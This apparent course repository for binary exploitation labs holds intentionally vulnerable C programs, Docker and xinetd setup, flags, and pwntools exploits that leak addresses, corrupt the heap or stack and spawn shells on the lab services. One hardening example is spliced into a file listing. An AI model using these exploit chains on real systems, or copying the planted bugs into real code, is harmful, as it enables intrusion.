--------------------------------------------------------------------------------
/week2/ret2plt/xinetd:
--------------------------------------------------------------------------------
service ret2plt
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/ret2plt/run.sh
    socket_type = stream
    protocol = tcp
    user = ret2plt
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
/week2/rop/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m rop
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/rop
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
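The week 2 ret2libc lab above leaks the resolved `__libc_start_main` pointer by calling `puts` on its GOT entry, subtracts the symbol's offset in libc-2.27.so to get the libc base, and then sends a second chain ending in `system("/bin/sh")`. The following is an added example and not code from the course repository; it shows the checks a practitioner puts around that step and a minimal stand-in for pwntools' `flat()`: the 6-byte leak is padded to 8, the computed base must be page-aligned (a misaligned base means a wrong libc build or a truncated read), and the finished chain must not contain the byte that terminates the input read. The gadget addresses and libc offsets are the ones in week2/exp/ret2libc.py; the leaked bytes used in the test are constructed for the example.

```python
#!/usr/bin/env python3
"""ret2libc leak handling and chain building (added example, not from the course repo)."""
import struct

# Offsets and gadgets taken from week2/exp/ret2libc.py (libc-2.27.so, Ubuntu 18.04 build)
LIBC_START_MAIN_OFF = 0x21AB0
SYSTEM_OFF = 0x4F440
BIN_SH_OFF = 0x1B3E9A
POP_RDI = 0x400733      # pop rdi ; ret
RET = 0x400506          # ret: realigns rsp to 16 bytes before entering system()
PAGE = 0x1000


def p64(v):
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


def u64(b):
    """Unpack up to 8 little-endian bytes; puts() yields 6 because the top two are 0."""
    if not 1 <= len(b) <= 8:
        raise ValueError("leak must be 1..8 bytes")
    return struct.unpack("<Q", bytes(b).ljust(8, b"\0"))[0]


def libc_base_from_leak(leak, symbol_off):
    """libc base from a leaked pointer, rejecting bases that cannot be a mapping start."""
    base = u64(leak) - symbol_off
    if base % PAGE:
        raise ValueError("libc base 0x%x is not page-aligned: wrong libc build or truncated leak" % base)
    return base


def flat(*items):
    """pwntools-style flat(): ints become little-endian qwords, bytes pass through."""
    return b"".join(p64(x) if isinstance(x, int) else bytes(x) for x in items)


def build_ret2libc_chain(libc_base, pad=0x38, terminators=(b"\n",)):
    """Second-stage payload: pad | ret | pop rdi | &"/bin/sh" | system.

    `terminators` lists bytes the input routine stops at; gets() stops at 0x0a,
    so any address containing it would cut the chain short.  Add b"\\0" for
    strcpy-style sinks.
    """
    chain = flat(b"a" * pad, RET, POP_RDI, libc_base + BIN_SH_OFF, libc_base + SYSTEM_OFF)
    for t in terminators:
        if t in chain[pad:]:
            raise ValueError("chain contains terminator byte %r; choose other gadgets or offsets" % t)
    return chain


if __name__ == "__main__":
    # Constructed leak for a hypothetical libc base of 0x7f1234567000 (not a real capture)
    leak = p64(0x7F1234567000 + LIBC_START_MAIN_OFF)[:6]
    base = libc_base_from_leak(leak, LIBC_START_MAIN_OFF)
    print("libc base: 0x%x" % base)
    print("chain:", build_ret2libc_chain(base).hex())
```

`u64(y.recv(6) + '\0\0')` in the original exploit is the same padding step; what the helper adds is the alignment check, which catches the common failure of pairing the leak with a libc build other than the one on the target.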
--------------------------------------------------------------------------------
/week2/rop/share/flag:
--------------------------------------------------------------------------------
FLAG{ROo0o0o0o0o0o0o0o00P}

--------------------------------------------------------------------------------
/week2/rop/share/rop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/rop/share/rop

--------------------------------------------------------------------------------
/week2/rop/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/rop/rop

--------------------------------------------------------------------------------
/week2/rop/xinetd:
--------------------------------------------------------------------------------
service rop
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/rop/run.sh
    socket_type = stream
    protocol = tcp
    user = rop
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}

--------------------------------------------------------------------------------
/week2/src/casino++.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>


int lottery[6] = {0}, guess[6] = {0};
char name[0x10] = {0};
int age, seed;

void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
    seed = time(0);
}

int read_int(){
    char buf[0x10];
    // glibc's fortified read(): the last argument is the buffer size the count is checked against
    __read_chk( 0 , buf , 0xf , 0x10 );
    return atoi( buf );
}

void welcome(){
    puts( "+--------------------+" );
    puts( "|       Casino       |" );
    puts( "+--------------------+" );
    puts( "" );
}


void casino(){

    srand( seed );
    for( int i = 0 ; i < 6 ; ++i ) lottery[i] = rand() % 100;

    int try = 2, idx;

    while( try-- ){
        printf( "\n$$$$$$$ Lottery $$$$$$$\n " );

        for( int i = 0 ; i < 6 ; ++i ){
            printf( "Chose the number %d: " , i );
            guess[i] = read_int();
        }

        printf( "Change the number? [1:yes 0:no]: " );
        if( read_int() == 1 ){
            printf( "Which number [1 ~ 6]: " );
            idx = read_int() - 1;
            printf( "Chose the number %d: " , idx );
            guess[idx] = read_int();
        }

        for( int i = 0 ; i < 6 ; ++i ){
            if( guess[i] != lottery[i] ) break;
            if( i == 5 ){
                puts( "You win! Hacker don't need luck :P" );
            }
        }
    }

    printf( "You lose.\nBye~\n " );
}


int main(){

    init();
    welcome();

    puts( "Show me your passport." );
    printf( "Your name: " );
    read( 0 , name , 0x100 ); // Oops

    printf( "Your age: " );
    age = read_int();

    if( age < 20 ){
        puts( "You can not enter the casino!" );
    }
    else{
        casino();
    }

    return 0;
}

--------------------------------------------------------------------------------
/week2/src/ret2libc.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>

void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}

int main(){

    init();

    puts( "Say hello to stack :D" );

    char buf[0x30];
    gets( buf );

    return 0;
}

--------------------------------------------------------------------------------
/week2/src/ret2plt.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>

void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}

int main(){

    init();

    system( "echo 'Say hello to stack :D'" );

    char buf[0x30];
    gets( buf );

    return 0;
}

--------------------------------------------------------------------------------
/week2/src/rop.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>

void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}

int main(){

    init();

    puts( "Say hello to stack :D" );

    char buf[0x30];
    gets( buf );

    return 0;
}

--------------------------------------------------------------------------------
/week3/Makefile:
--------------------------------------------------------------------------------
all: src/uaf.c src/note.c src/t-note.c src/election.c src/note++.c
	gcc src/uaf.c -o ./uaf/share/uaf
	gcc src/note.c -o ./note/share/note
	gcc src/t-note.c -o ./t-note/share/t-note
	gcc src/election.c -o ./election/share/election
	gcc src/note++.c -o ./note++/share/note++

clean:
	rm uaf/share/uaf note/share/note t-note/share/t-note election/share/election note++/share/note++

--------------------------------------------------------------------------------
/week3/docker-compose.yml:
--------------------------------------------------------------------------------
version: '2'
services:
  uaf:
    build: ./uaf/
    volumes:
      - ./uaf/share:/home/uaf:ro
      - ./uaf/xinetd:/etc/xinetd.d/uaf:ro
      - ./tmp:/tmp:ro
    ports:
      - "10177:4597"
  note:
    build: ./note/
    volumes:
      - ./note/share:/home/note:ro
      - ./note/xinetd:/etc/xinetd.d/note:ro
      - ./tmp:/tmp:ro
    ports:
      - "10178:4597"
  t-note:
    build: ./t-note/
    volumes:
      - ./t-note/share:/home/t-note:ro
      - ./t-note/xinetd:/etc/xinetd.d/t-note:ro
      - ./tmp:/tmp:ro
    ports:
      - "10179:4597"
  election:
    build: ./election/
    volumes:
      - ./election/share:/home/election:ro
      - ./election/xinetd:/etc/xinetd.d/election:ro
      - ./tmp:/tmp:ro
    ports:
      - "10180:4597"
  note_pro:
    build: ./note++/
    volumes:
      - ./note++/share:/home/note++:ro
      - ./note++/xinetd:/etc/xinetd.d/note++:ro
      - ./tmp:/tmp:ro
    ports:
      - "10181:4597"

--------------------------------------------------------------------------------
/week3/election/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m election
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/election
CMD ["/usr/sbin/xinetd","-dontfork"]

--------------------------------------------------------------------------------
/week3/election/share/election:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/election/share/election

--------------------------------------------------------------------------------
/week3/election/share/flag:
--------------------------------------------------------------------------------
FLAG{Wh0_h4cked_my_v0t1ng_sys7em_:P}

--------------------------------------------------------------------------------
/week3/election/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 180 /home/election/election

--------------------------------------------------------------------------------
/week3/election/xinetd:
--------------------------------------------------------------------------------
service election
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/election/run.sh
    socket_type = stream
    protocol = tcp
    user = election
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}

--------------------------------------------------------------------------------
/week3/exp/election.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'

e , l = ELF( '../election/share/election' ) , ELF( './libc-2.27.so' )

y = remote( 'localhost' , 10180 )
#y = remote( 'edu-ctf.csie.org' , 10180 )
#y = process( '../election/share/election' )
#pause()

def login( tok ):
    y.sendafter( '>' , '1' )
    y.sendafter( ':' , tok )

def reg( tok ):
    y.sendafter( '>' , '2' )
    y.sendafter( ':' , tok )

def logout():
    y.sendafter( '>' , '3' )

def vote( idx ):
    y.sendafter( '>' , '1' )
    y.sendafter( ':' , str( idx ) )

def say( idx , data ):
    y.sendafter( '>' , '2' )
    y.sendafter( ':' , str( idx ) )
    y.sendafter( 'Message: ' , data )


reg( 'a' * 0xb8 )

tok = 'a' * 0xb8
canary = '\0'


for i in range( 7 ):
    print i
    for c in map( chr , range( 0xff , -1 , -1 ) ):
        login( tok + canary + c )
        o = y.recvline()
        if 'Invalid token' not in o:
            canary += c
            info( hex( u64( canary.ljust( 8 , '\0' ) ) ) )
            logout()
            break


success( 'canary -> %s' % hex( u64( canary ) ) )

pie = ''

for i in range( 6 ):
    print i
    for c in map( chr , range( 0xff , -1 , -1 ) ):
        login( tok + canary + pie + c )
        o = y.recvline()
        if 'Invalid token' not in o:
            pie += c
            info( hex( u64( pie.ljust( 8 , '\0' ) ) ) )
            logout()
            break

pie = u64( pie.ljust( 8 , '\0' ) ) - 0x1140
e.address = pie

success( 'pie -> %s' % hex( pie ) )

for i in range( 25 ):
    print i
    reg( 'a' )
    login( 'a' )
    for j in range(10):
        vote( 1 )
    logout()

reg( 'a' )
login( 'a' )
for j in range(5):
    vote( 1 )
logout()


buf = pie + 0x202160

leave_ret = pie + 0xbe9
pop_rdi = pie + 0x11a3

csu = pie + 0x1180
ppppppr = pie + 0x119a # pop rbx; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

p = flat(
    0,
    pop_rdi,
    e.got.__libc_start_main,
    e.plt.puts,
    ppppppr,
    0, 1, buf + 0xa0, 0, buf + 0xa0 - 8, 0x100,
    csu,
    0, 0, 0, 0, 0, 0, 0,
    0x7777777,
    e.plt.read
)
login( p )

login( 'a' )

p = flat(
    'a' * 0xe8,
    canary,
    buf,
    leave_ret
)
say( 1 , p[:-1] )

logout()
y.recvline()
l.address = u64( y.recv(6) + '\0\0' ) - l.sym.__libc_start_main
success( 'libc -> %s' % hex( l.address ) )

one = 0x10a38c
y.send( p64( l.address + one ) )

sleep( 0.3 )
y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()

--------------------------------------------------------------------------------
/week3/exp/libc-2.23.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/exp/libc-2.23.so

--------------------------------------------------------------------------------
/week3/exp/libc-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/exp/libc-2.27.so

--------------------------------------------------------------------------------
/week3/exp/note++.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'
l = ELF( 'libc-2.23.so' )

y = remote( 'localhost' , 10181 )
#y = remote( 'edu-ctf.csie.org' , 10181 )
#y = process( '../note++/share/note++' )
#pause()


def add( size , note , desc ):
    y.sendafter( '>' , '1' )
    y.sendafter( 'Size: ' , str( size ) )
    y.sendafter( 'Note: ' , note )
    y.sendlineafter( ': ' , desc )

def lis():
    y.sendafter( '>' , '2' )
    #y.sendafter( 'Index: ' , str( index ) )

def dle( index ):
    y.sendafter( '>' , '3' )
    y.sendafter( 'Index: ' , str( index ) )



add( 0x68 , 'a' , 'A' )
add( 0x68 , 'b' , 'B' )
add( 0x68 , 'c' , 'C' )
add( 0x68 , flat( '\0' * 0x58 , 0x71 ) , 'D' )
add( 0x78 , 'a' * 0x78 , 'U' * 0x30 )
add( 0x78 , 'b' * 0x78 , 'd' )
add( 0x10 , 'p' , 'p' )

dle( 3 )
dle( 1 )
dle( 2 )
dle( 0 )

add( 0x68 , 'a' , 'a' * 0x38 )

lis()
y.recvuntil( 'Note 1:' )
y.recvuntil( 'Data: ' )
heap = u64( y.recv(6) + '\0\0' ) - 0x150
success( 'heap -> %s' % hex( heap ) )

dle( 1 )

add( 0x68 , p64( heap + 0x1b0 ) , 'a' )
add( 0x68 , 'a' , 'a' )
add( 0x68 , 'a' , 'a' )

add( 0x68 , flat( 0 , p64( 0x101 ) ) , 'a' )

dle( 4 )

dle( 3 )
add( 0x68 , 'a' , 'a' * 0x38 )

lis()
y.recvuntil( 'Note 4:' )
y.recvuntil( 'Data: ' )
l.address = u64( y.recv(6) + '\0\0' ) - 0x3c4b78
success( 'libc -> %s' % hex( l.address ) )

dle(1)
dle(2)
dle(0)
add( 0x68 , 'a' , 'a' * 0x38 )

dle(1)

add( 0x68 , p64( l.sym.__malloc_hook - 0x10 - 3 ) , 'a' )
add( 0x68 , 'a' , 'a' )
add( 0x68 , 'a' , 'a' )

one = 0xf02a4

add( 0x68 , 'a' * 3 + p64( l.address + one ) , 'a' )

dle(4)

sleep( 0.3 )
y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()

--------------------------------------------------------------------------------
/week3/exp/note.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'
l = ELF( 'libc-2.23.so' )

y = remote( 'localhost' , 10178 )
#y = remote( 'edu-ctf.csie.org' , 10178 )
#y = process( '../note/share/note' )
#pause()


def add( size , note ):
    y.sendafter( '>' , '1' )
    y.sendafter( 'Size: ' , str( size ) )
    y.sendafter( 'Note: ' , note )

def show( index ):
    y.sendafter( '>' , '2' )
    y.sendafter( 'Index: ' , str( index ) )

def delete( index ):
    y.sendafter( '>' , '3' )
    y.sendafter( 'Index: ' , str( index ) )


add( 0x100 , 'leak' ) # 0
add( 0x68 , 'a' ) # 1
add( 0x68 , 'b' ) # 2

delete( 0 )

show( 0 )
y.recvline()
l.address = u64( y.recv(6) + '\0\0' ) - 0x3c4b78
success( 'libc -> %s' % hex( l.address ) )


delete( 1 )
delete( 2 )
delete( 1 )

add( 0x68 , p64( l.sym.__malloc_hook - 0x10 - 3 ) )
add( 0x68 , 'a' )
add( 0x68 , 'a' )

#add( 0x68 , 'aaa' + p64( 0x66666666 ) )

# system
add( 0x68 , 'aaa' + p64( l.sym.system ) )
y.sendafter( '>' , '1' )
y.sendafter( 'Size: ' , str( l.search( '/bin/sh' ).next() ) )

# one gadget
'''
add( 0x68 , 'aaa' + p64( l.address + 0xf02a4 ) )
delete( 0 )
'''

sleep(0.1)
y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()

--------------------------------------------------------------------------------
/week3/exp/t-note.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'
l = ELF( 'libc-2.27.so' )

y = remote( 'localhost' , 10179 )
#y = remote( 'edu-ctf.csie.org' , 10179 )
#y = process( '../t-note/share/t-note' )
#pause()


def add( size , note ):
    y.sendafter( '>' , '1' )
    y.sendafter( 'Size: ' , str( size ) )
    y.sendafter( 'Note: ' , note )

def show( index ):
    y.sendafter( '>' , '2' )
    y.sendafter( 'Index: ' , str( index ) )

def delete( index ):
    y.sendafter( '>' , '3' )
    y.sendafter( 'Index: ' , str( index ) )


add( 0x410 , 'leak' ) # 0
add( 0x20 , 'a' ) # 1

delete( 0 )

show( 0 )
y.recvline()
l.address = u64( y.recv(6) + '\0\0' ) - 0x3ebca0
success( 'libc -> %s' % hex( l.address ) )

delete( 1 )
delete( 1 )

add( 0x20 , p64( l.sym.__free_hook ) )
add( 0x20 , 'a' )
add( 0x20 , p64( l.address + 0x4f322 ) )

delete( 0 )

sleep(0.1)
y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()

--------------------------------------------------------------------------------
/week3/exp/uaf.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'

y = remote( 'localhost' , 10177 )
#y = remote( 'edu-ctf.csie.org' , 10177 )
#y = process( '../uaf/share/uaf' )
#pause()

y.sendafter( 'Size of your message: ' , str( 0x10 ) )
y.sendafter( 'Message:' , 'a' * 8 )

y.recvuntil( 'a' * 8 )

pie = u64( y.recv(6) + '\0\0' ) - 0xa77
success( 'PIE -> %s' % hex( pie ) )

y.sendafter( 'Size of your message: ' , str( 0x10 ) )
y.sendafter( 'Message:' , 'a' * 8 + p64( pie + 0xab5 ) )

y.sendafter( 'Size of your message: ' , str( 0x100 ) )
y.sendafter( 'Message:' , 'a' * 8 )

sleep(0.1)
y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()

--------------------------------------------------------------------------------
/week3/note++/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:16.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m note++
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/note++
CMD ["/usr/sbin/xinetd","-dontfork"]

--------------------------------------------------------------------------------
/week3/note++/share/flag:
--------------------------------------------------------------------------------
FLAG{Heap_exp1oit4ti0n_15_fun}

--------------------------------------------------------------------------------
/week3/note++/share/note++:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/note++/share/note++

--------------------------------------------------------------------------------
/week3/note++/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/note++/note++

--------------------------------------------------------------------------------
/week3/note++/xinetd:
--------------------------------------------------------------------------------
service note++
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/note++/run.sh
    socket_type = stream
    protocol = tcp
    user = note++
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}

--------------------------------------------------------------------------------
/week3/note/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:16.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m note
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/note
CMD ["/usr/sbin/xinetd","-dontfork"]

--------------------------------------------------------------------------------
/week3/note/share/flag:
--------------------------------------------------------------------------------
FLAG{Pwned_7he_f1rst_b1nary_w17h0ut_0verf1ow}

--------------------------------------------------------------------------------
/week3/note/share/note:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/note/share/note

--------------------------------------------------------------------------------
/week3/note/share/run.sh:
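The sources in this repository share two input-handling defects that the exploit scripts above lean on: casino++.c reads 0x100 bytes into the 0x10-byte global `name` (the `// Oops` line) and ret2libc.c, ret2plt.c and rop.c call `gets`, while election.c compares the submitted token with `memcmp( buf , token , len )` using the caller-chosen `len` (the byte-by-byte oracle election.py walks) and reads up to 255 message bytes into the 0xe0-byte `msg`. The block below is an added example, not code from the course, of the two helpers a hardened version would use: a bounded line reader that can never write past its destination, and a token check that requires an exact length match so the comparison cannot run off the end of the registered token. The `passport` struct, `feed_through_pipe` and the sample inputs are constructed for the check; the pipe stands in for stdin so it runs offline.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Read one line from fd into dst without ever writing more than cap bytes
 * (cap - 1 payload bytes plus the NUL). Input past the capacity is drained
 * and dropped, so a long line neither overflows dst nor lingers in the
 * stream for the next prompt. Returns the number of bytes kept, or -1 on
 * a read error or on EOF before any byte arrived. */
ssize_t read_line_bounded( int fd , char *dst , size_t cap ){
    if( cap == 0 ) return -1;
    size_t n = 0;
    char c;
    ssize_t r;
    while( ( r = read( fd , &c , 1 ) ) == 1 ){
        if( c == '\n' ) break;
        if( n + 1 < cap ) dst[n++] = c;   /* keep one byte for the NUL */
        /* otherwise the byte is over capacity: discarded, never written */
    }
    if( r < 0 || ( r == 0 && n == 0 ) ) return -1;
    dst[n] = '\0';
    return (ssize_t) n;
}

/* Test plumbing (constructed): push `in` through a pipe and read it back
 * with the bounded reader into dst[cap]. Returns read_line_bounded's result. */
ssize_t feed_through_pipe( const char *in , size_t in_len , char *dst , size_t cap ){
    int p[2];
    if( pipe( p ) != 0 ) return -1;
    ssize_t w = write( p[1] , in , in_len );
    close( p[1] );
    ssize_t kept = ( w == (ssize_t) in_len ) ? read_line_bounded( p[0] , dst , cap ) : -1;
    close( p[0] );
    return kept;
}

/* Mirrors the casino++ globals: a 16-byte name followed by two ints. */
struct passport{
    char name[0x10];
    int age;
    int seed;
};

/* Feed an 0x100-byte name (the size casino++ reads) and check that only
 * 15 bytes are stored and the neighbouring fields are untouched. */
int oversized_name_is_contained( void ){
    char big[0x100 + 1];
    memset( big , 'a' , 0x100 );
    big[0x100] = '\n';
    struct passport pp = { .age = 42 , .seed = 0x1337 };
    ssize_t kept = feed_through_pipe( big , sizeof( big ) , pp.name , sizeof( pp.name ) );
    return kept == 0xf && strlen( pp.name ) == 0xf && pp.age == 42 && pp.seed == 0x1337;
}

/* A line that fits is stored whole. */
int short_line_roundtrip( void ){
    char out[16];
    return feed_through_pipe( "yuawn\n" , 6 , out , sizeof( out ) ) == 5 && strcmp( out , "yuawn" ) == 0;
}

/* Token check for election.c. The submission must be exactly as long as the
 * registered token, so the comparison never runs past `token` into whatever
 * follows it on the stack; that length rule is what removes the oracle.
 * The loop also touches every byte regardless of where the first mismatch
 * is, so timing does not leak a position either. Returns 1 on match. */
int token_matches( const uint8_t *submitted , size_t submitted_len ,
                   const uint8_t *registered , size_t registered_len ){
    if( submitted_len != registered_len ) return 0;
    uint8_t diff = 0;
    for( size_t i = 0 ; i < registered_len ; ++i ){
        diff |= submitted[i] ^ registered[i];
    }
    return diff == 0;
}
```

In election.c the equivalent change is to remember how many bytes `read` stored into `token` at registration and pass that as `registered_len`; any submission longer than the token is then refused before a single byte is compared, which is exactly the condition the canary and PIE loops in election.py depend on.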
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/note/note

--------------------------------------------------------------------------------
/week3/note/xinetd:
--------------------------------------------------------------------------------
service note
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/note/run.sh
    socket_type = stream
    protocol = tcp
    user = note
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}

--------------------------------------------------------------------------------
/week3/src/election.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <stdint.h>
#define TIMEOUT 180
#define candidates_num 10


struct Candidate{
    char *name;
    uint8_t votes;
} candidates[candidates_num];

int vote = 0;
char buf[0xc8];

char* candidates_name[candidates_num] = {
    "Pusheen",
    "Angelboy",
    "Chinese Tsai",
    "Korean Cat",
    "Trump",
    "Nini ",
    "how2vote",
    "Rilakkuma",
    "John Cena",
    "Capoo"
};


void handler( int signum ){
    uint8_t max = 0;
    for( int i = 0 ; i < candidates_num ; ++i ) max = candidates[i].votes > max ? candidates[i].votes : max;
    for( int i = 0 ; i < candidates_num ; ++i ){
        if( candidates[i].votes == max ){
            printf( "Congrat to %s !!!\n" , candidates[i].name );
            break;
        }
    }
    _exit(1);
}

int read_int(){
    char buf[0x10];
    // glibc's fortified read(): the last argument is the buffer size the count is checked against
    __read_chk( 0 , buf , 0xf , 0x10 );
    return atoi( buf );
}


void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
    signal( SIGALRM , handler );
    alarm( TIMEOUT );
}


void banner(){
    puts( "+-------------------------------------------+" );
    puts( "|   EDU 2019 Election Voting System v1.0    |" );
    puts( "+-------------------------------------------+" );
}

void welcome(){
    banner();
    puts( "1. Login" );
    puts( "2. Register" );
    puts( "3. Exit" );
    puts( ">" );
}


void init_candidates(){
    for( int i = 0 ; i < candidates_num ; ++i ){
        candidates[i].name = candidates_name[i];
        candidates[i].votes = 0;
    }
}


void menu(){
    banner();
    puts( "1. Vote" );
    puts( "2. I want to say something to candidates" );
    puts( "3. Logout" );
    puts( ">" );
}



void voting(){
    int n , idx;
    char msg[0xe0];
    while(1){
        menu();
        n = read_int();
        switch( n ){
            case 1:
                if( !vote ){
                    puts( "You can not vote anymore :(" );
                    break;
                }
                puts( "Candidates:" );
                for( int i = 0 ; i < candidates_num ; ++i ){
                    printf( "%d. %s\tvotes: %u\n" , i , candidates[i].name , candidates[i].votes );
                }
                printf( "Your choice [0~9]: " );
                idx = read_int();
                if( idx < 0 || idx >= candidates_num ){
                    puts( "Invalid choice." );
                    break;
                }
                candidates[idx].votes += 1;
                vote -= 1;
                printf( "Done!\n%s: Thank you!\n" , candidates[idx].name );
                break;

            case 2:
                puts( "The more votes candidate has, the more message you can say!" );
                printf( "To [0~9]: " );
                idx = read_int();
                if( idx < 0 || idx >= candidates_num ){
                    puts( "Invalid choice." );
                    break;
                }
                printf( "To %s:\nMessage: " , candidates[idx].name );
                read( 0 , msg , candidates[idx].votes );
                puts( "Done!" );
                break;

            case 3:
                return;

            default:
                puts( ":)" );
                break;
        }
    }
}

int main(){

    init();

    init_candidates();

    char token[0xb8] = {0};

    while(1){
        welcome();
        int n = read_int();

        switch( n ){
            case 1:
                printf( "Token: " );
                int len = read( 0 , buf , sizeof( buf ) );

                if( memcmp( buf , token , len ) ){
                    puts( "Invalid token." );
                    break;
                }

                voting();
                break;
            case 2:
                printf( "Register an anonymous token: " );
                read( 0 , token , sizeof( token ) );

                vote = 10;
                puts( "Done!" );
                break;
            case 3:
                handler(0);
                break;
            default:
                puts( ":)" );
                break;
        }
    }
    return 0;
}

--------------------------------------------------------------------------------
/week3/src/note++.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#define MAX 10


void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}


int read_int(){
    char buf[0x10];
    // glibc's fortified read(): the last argument is the buffer size the count is checked against
    __read_chk( 0 , buf , 0xf , 0x10 );
    return atoi( buf );
}

int read_input( char *buf , unsigned int size ){
    int ret = __read_chk( 0 , buf , size , size );
    if(ret <= 0){
        puts("read error");
        _exit(1);
    }
    if(buf[ret-1] == '\n'){
        buf[ret-1] = '\0';
    }
    return ret;
}


struct Note{
    int is_freed;
    char *data;
    char description[48];
};

struct Note notes[MAX];

void add(){
    for( int i = 0 ; i < MAX ; ++i ){
        if( !notes[i].data || notes[i].is_freed ){

            printf( "Size: " );
            unsigned int size = read_int();

            if( size > 0x78 ){
                puts( "Too big!" );
                return;
            }

            notes[i].data = malloc( size );
            memset( notes[i].data , 0 , size ); // no information leak

            printf( "Note: " );
            read_input( notes[i].data , size - 1 );

            printf( "Description of this note: " );

            // fixed overflow
            // scanf( "%s" , notes[i].description ) // overflow
            scanf( "%48s" , notes[i].description ); // safe

            notes[i].is_freed = 0;

            puts( "Done!" );
            return;
        }
    }
    puts( "Full!" );
}


void list(){
    for( int i = 0 ; i < MAX ; ++i ){
        if( notes[i].data && !notes[i].is_freed ){
            printf( "Note %d:\n    Data: %s\n    Desc: %s\n" , i , notes[i].data , notes[i].description );
        }
    }
    puts("");
}


void delete(){
    printf( "Which note do you want to delete?\nIndex: " );
    uint64_t idx = read_int();

    if( idx >= MAX ){
        puts( "Invalid index." );
        return;
    }

    if( !notes[idx].data ){
